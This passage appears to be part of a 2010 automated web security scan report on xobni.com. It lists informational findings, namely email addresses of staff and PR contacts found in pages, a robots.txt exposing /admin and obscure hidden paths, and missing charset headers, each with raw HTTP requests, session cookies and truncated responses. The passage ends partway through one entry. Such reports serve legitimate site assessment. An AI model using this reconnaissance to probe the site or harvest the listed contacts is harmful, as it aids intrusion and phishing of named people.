14.20. http://www.xobni.com/legal/ip_policy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /legal/ip_policy

Issue detail

The following email address was disclosed in the response:

Request

GET /legal/ip_policy HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/tos
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9181

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>IP Policy</TITLE>
...[SNIP]...
<p>By email: legal@xobni.com</p>
...[SNIP]...

14.21. http://www.xobni.com/legal/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /legal/privacy

Issue detail

The following email address was disclosed in the response:

Request

GET /legal/privacy HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19920

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Politique de conf
...[SNIP]...
<p>En cas de question sur le présente Politique de confidentialité, sur les pratiques de ce site ou sur votre utilisation de celui-ci, veuillez nous contacter à privacy@xobni.com ou nous écrire à l’adresse suivante : </p>
...[SNIP]...

14.22. http://www.xobni.com/legal/trademarks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /legal/trademarks

Issue detail

The following email address was disclosed in the response:

Request

GET /legal/trademarks HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Trademarks and Br
...[SNIP]...
<li>Questions and requests for permission may be submitted by emailing us at: info@xobni.com with complete samples of each proposed use. </li>
...[SNIP]...

14.23. http://www.xobni.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /mobile

Issue detail

The following email address was disclosed in the response:

Request

GET /mobile HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:05:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16307

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni pour BlackB
...[SNIP]...
<div class="fineprint" style="margin-top: 12px;">e.g., john.smith@xobni.com</div>
...[SNIP]...

14.24. http://www.xobni.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /mobile/

Issue detail

The following email address was disclosed in the response:

Request

GET /mobile/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/one/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16310

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni pour BlackB
...[SNIP]...
<div class="fineprint" style="margin-top: 12px;">e.g., john.smith@xobni.com</div>
...[SNIP]...

14.25. http://www.xobni.com/opensource/NsisDotNet/README.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /opensource/NsisDotNet/README.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /opensource/NsisDotNet/README.htm HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/about/opensource.php
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:20:37 GMT
Server: Apache
Last-Modified: Thu, 29 Oct 2009 18:49:15 GMT
ETag: "3b41dd-c51-477175e3000c0"
Accept-Ranges: bytes
Content-Length: 3153
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>This plugin for the NSIS install</title>
</h
...[SNIP]...
<br>
   !define SUPPORT_EMAIL &quot;support@xobni.com&quot;</font>
...[SNIP]...
<a href="mailto:adam.smith@xobni.com">
...[SNIP]...

14.26. http://www.xobni.com/press/05202010_german_release.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /press/05202010_german_release.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /press/05202010_german_release.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14896

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Press Cente
...[SNIP]...
</p>

US:                UK:                Germany:
Terra Carmichael            Sarah Porter            Detlev Henning
terra@xobni.com            sarah.porter@axicom.com    Detlev.henning@axicom.com
415.684.7681            0208 392 4066

<h2>
...[SNIP]...
<a href="mailto:terra@xobni.com">terra@xobni.com</a>
...[SNIP]...
<a href="mailto:sarah.porter@axicom.com">sarah.porter@axicom.com</a>
...[SNIP]...
<a href="mailto:Detlev.henning@axicom.com">Detlev.henning@axicom.com</a>
...[SNIP]...

14.27. http://www.xobni.com/press/09022010_harris_survey

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /press/09022010_harris_survey

Issue detail

The following email addresses were disclosed in the response:

Request

GET /press/09022010_harris_survey HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17914

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Press Cente
...[SNIP]...
<a href="mailto:terra@xobni.com">terra@xobni.com</a>
...[SNIP]...
<a href="mailto:Samantha@sutherlandgold.com">Samantha@sutherlandgold.com</a>
...[SNIP]...

14.28. http://www.xobni.com/press/10282010_french_release.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /press/10282010_french_release.php

Issue detail

The following email address was disclosed in the response:

Request

GET /press/10282010_french_release.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12289

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Press Cente
...[SNIP]...
<a href="mailto:terra@xobni.com">terra@xobni.com</a>
...[SNIP]...

14.29. http://www.xobni.com/support/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /support/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /support/ HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.10.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 200143

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Xobni Sup
...[SNIP]...
<a href='mailto:billing@xobni.com'>billing@xobni.com</a>
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...
<i>Theo buys a Xobni Plus license to use on his desktop computer at the office. He uses his work account (theo@initech.com) to register his license. At home, Theo uses a laptop to check his personal Yahoo! mail account, so he buys a 2nd license of Xobni Plus (and uses his work email account to activate the 2nd seat licens
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
he Login column,Look in your Outlook Inbox for the email with the new password *NOTE: Look in your spam or junkmail folders, if you do not see it in the inbox. If you do not receive it, please email billing@xobni.com to have us email you one.If you are able to log into your Xobni account on www.xobni.com/account, and simply want to change your Xobni account password, please do the following:Go to www.xobni.com/acc
...[SNIP]...
egation of data gathered from your local email data. In this case, the word 'Network' simply refers to your personal 'network' of contacts. For example, let's say that you have received an email from John@contoso.com with terra@contoso.com and ken@contoso.com on the cc line. Now when you go to view Ken's Xobni profile, you will see John and Terra listed in his network, even though Ken has never sent you an email. You may find that you have unfamiliar peo
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...

14.30. http://www.xobni.com/support/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /support/index.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /support/index.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 200170

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Xobni Sup
...[SNIP]...
<a href='mailto:billing@xobni.com'>billing@xobni.com</a>
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...
<i>Theo buys a Xobni Plus license to use on his desktop computer at the office. He uses his work account (theo@initech.com) to register his license. At home, Theo uses a laptop to check his personal Yahoo! mail account, so he buys a 2nd license of Xobni Plus (and uses his work email account to activate the 2nd seat licens
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
he Login column,Look in your Outlook Inbox for the email with the new password *NOTE: Look in your spam or junkmail folders, if you do not see it in the inbox. If you do not receive it, please email billing@xobni.com to have us email you one.If you are able to log into your Xobni account on www.xobni.com/account, and simply want to change your Xobni account password, please do the following:Go to www.xobni.com/acc
...[SNIP]...
egation of data gathered from your local email data. In this case, the word 'Network' simply refers to your personal 'network' of contacts. For example, let's say that you have received an email from John@contoso.com with terra@contoso.com and ken@contoso.com on the cc line. Now when you go to view Ken's Xobni profile, you will see John and Terra listed in his network, even though Ken has never sent you an email. You may find that you have unfamiliar peo
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...

14.31. https://www.xobni.com/support/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.xobni.com
Path:   /support/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /support/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 200452

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Xobni Sup
...[SNIP]...
<a href='mailto:billing@xobni.com'>billing@xobni.com</a>
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...
<i>Theo buys a Xobni Plus license to use on his desktop computer at the office. He uses his work account (theo@initech.com) to register his license. At home, Theo uses a laptop to check his personal Yahoo! mail account, so he buys a 2nd license of Xobni Plus (and uses his work email account to activate the 2nd seat licens
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
he Login column,Look in your Outlook Inbox for the email with the new password *NOTE: Look in your spam or junkmail folders, if you do not see it in the inbox. If you do not receive it, please email billing@xobni.com to have us email you one.If you are able to log into your Xobni account on www.xobni.com/account, and simply want to change your Xobni account password, please do the following:Go to www.xobni.com/acc
...[SNIP]...
egation of data gathered from your local email data. In this case, the word 'Network' simply refers to your personal 'network' of contacts. For example, let's say that you have received an email from John@contoso.com with terra@contoso.com and ken@contoso.com on the cc line. Now when you go to view Ken's Xobni profile, you will see John and Terra listed in his network, even though Ken has never sent you an email. You may find that you have unfamiliar peo
...[SNIP]...
<a href='mailto:mobilesupport@xobni.com'>mobilesupport@xobni.com</a>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...
<a href='mailto:billing@xobni.com'>
...[SNIP]...

15. Credit card numbers disclosed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/datasheets/data_sheet-enterprise-031010.pdf

Issue detail

The following credit card numbers were disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /enterprise/datasheets/data_sheet-enterprise-031010.pdf HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:29 GMT
Server: Apache
Last-Modified: Wed, 02 Jun 2010 23:10:58 GMT
ETag: "3b04c0-89ec1-4881433e1c480"
Accept-Ranges: bytes
Content-Length: 564929
Connection: close
Content-Type: application/pdf

%PDF-1.3
...[SNIP]...

16. Robots.txt file

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.xobni.com
Path:   /videos/

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.xobni.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:12:42 GMT
Server: Apache
Last-Modified: Thu, 29 Oct 2009 18:49:15 GMT
ETag: "3b03cf-bf-477175e3000c0"
Accept-Ranges: bytes
Content-Length: 191
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Allow all other robots to browse everywhere
User-agent: *
Disallow: /admin
Disallow: /push
Disallow: /xlbh084ghjklyvco872656468
Disallow: /xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l

17. HTML does not specify charset
There are 5 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


17.1. http://www.xobni.com/media/plus/xobni_plus_07.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /media/plus/xobni_plus_07.php

Request

GET /media/plus/xobni_plus_07.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/plus/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:20:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2240
Connection: close
Content-Type: text/html

<html>
   <head>
       <style type="text/css">
           body {
               margin: 0;
               background-color: black;
               color: white;
           }
           #noUpdate {
               padding: 10px;
               font: normal 13px Arial;
               color: #808080;
...[SNIP]...

17.2. http://www.xobni.com/media/walkthroughs/xobni_features_02/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /media/walkthroughs/xobni_features_02/

Request

GET /media/walkthroughs/xobni_features_02/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3567
Connection: close
Content-Type: text/html

<html>
   <head>
       <style type="text/css">
           body {
               margin: 0;
               background-color: black;
               color: white;
           }
           #noUpdate {
               padding: 10px;
               font: normal 13px Arial;
               color: #808080;
...[SNIP]...

17.3. http://www.xobni.com/media/widgets.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /media/widgets.html

Request

GET /media/widgets.html HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/media/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:19:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 22:11:24 GMT
ETag: "3b089d-b5-486e59f3c3b00"
Accept-Ranges: bytes
Content-Length: 181
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<HTML>
<SCRIPT>
    var xobni = {};

    xobni.ContentFetcher = window.external.Create("ContentFetcher");
    document.write(xobni.ContentFetcher.GetPageContent());
</SCRIPT>
</HTML>

17.4. http://www.xobni.com/support/howto

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /support/howto

Request

GET /support/howto HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
